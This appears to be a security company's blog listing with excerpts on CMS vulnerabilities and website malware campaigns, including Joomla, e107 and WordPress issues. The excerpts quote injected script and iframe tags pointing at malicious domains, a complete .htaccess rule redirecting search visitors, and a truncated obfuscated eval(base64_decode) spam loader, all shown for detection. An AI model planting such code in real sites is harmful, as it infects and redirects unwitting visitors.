Joomla updates (1.5.26 and 2.5.4)

If you are using Joomla, now is a good time to check if your sites are updated. Some (high severity) vulnerabilities were fixed in the latest release, especially if you are still on the 1.5.x branch.

For 1.5.26:

High Priority – Core – Password Change Vulnerability.
Low Priority – Core – Information Disclosure.

For 2.5.4:

Low Priority – Core – Information Disclosure.
Low Priority – Core – XSS Vulnerability.

Version 2.5.3 (released 2 weeks ago) also contains multiple security fixes, so if you haven’t updated your sites lately, you better check them asap.

More details on their release notes for 1.5.26 and for 2.5.4.

*Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

e107 Being Exploited – Vulnerable contact.php Scanned and Attacked

We are seeing an old vulnerability on e107 being widely scanned and exploited. e107 is a free open source content management system (CMS).

More details on the vulnerability are available here:

It was discovered that access control to the [php] bbcode which allows executing PHP code is wrongly implemented in e107. This allows unauthenticated users to execute arbitrary PHP code easily.

Affected versions
Affected is e107 < = 0.7.20
MOPS-2010-111
MOPS-2010-112


Read More

Malware Campaign from .rr.nu

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.

This is what gets added to the footer of the hacked sites:

<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>

Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit via browser using multiple exploit kits.


Read More

Vulnerability in the Absolute Privacy Plugin

We are seeing reports that a vulnerability in the Absolute Privacy WordPress plugin (link) is being used to hack and compromise sites with it installed.

This plugin has a serious unpatched security vulnerability that allows anyone to login in the WordPress site without a password. From Secunia:

Schaffnern has discovered a vulnerability in the Absolute Privacy plugin for WordPress, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to an error within the “abpr_authenticateUser()” function in wp-content/plugins/absolute-privacy/functions.php, which prevents the password from being verified. This can be exploited to bypass the authentication mechanism and gain administrative access to the application.

The vulnerability is confirmed in version 2.0.5. Other versions may also be affected.

Note that this plugin has had more than 35 thousand downloads and no patches for this bug. We recommend deleting this plugin asap until a fix is in place.

Our team is still analysing this vulnerability and we will post more details soon. Additional information and original report was found here.


If you think your site has been compromised, you can verify it in here: http://sitecheck.sucuri.net

Malware Redirecting To Enormousw1illa.com

We are seeing a large number of sites compromised with a conditional redirection to the domain http://enormousw1illa.com/ (194.28.114.102).

On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get redirected to that malicious domain (http://enormousw1illa.com/nl-in.php?nnn=556).

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]

Google is already blacklisting it and so far it found that it was used to compromise 787 domains (but the number is probably bigger, since that domain just went live 3 days ago – Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including mieszkanielondyn.com/, thecentsiblelife.com/, red66.com/.

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:

enormousw1illa.com
infoitpoweringgathering.com
sweepstakesandcontestsdo.com
sweepstakesandcontestsnow.com
.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.


If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here: http://sitecheck.sucuri.net

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..


Read More

WordPress 3.3 XSS Vulnerability Patched (3.3.1 Released)

We just learned of a reflected XSS vulnerability in WordPress 3.3 via the comments form (wp-comments.php). It is explained in detail here.

The disclosed vulnerability can only be triggered via Internet Explorer according to the disclosing party, our tests lead to the same result.

To further note, this is hard to reproduce because it does not get triggered when WordPress is installed via a domain. If you’re running WordPress 3.3, and WordPress was installed via a domain, you’re not vulnerable. (ethicalhack3r)

We do not consider this to be a serious vulnerability, however, we recommend updating to WordPress 3.3.1 since the vulnerability can be used in targeted attacks. More info on the release can be found in the WordPress Codex, over via the release post.

Happy New Year From the Sucuri Team

Just a quick message to thank everyone that worked with us during 2011 (clients, partners and friends), and to wish a wonderful 2012 to all of you.

We have some cool projects and posts to share in the near future, so stay tune for updates soon.

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2″, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.

Read More

Malware Being Called From Your php.ini File

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:


Read More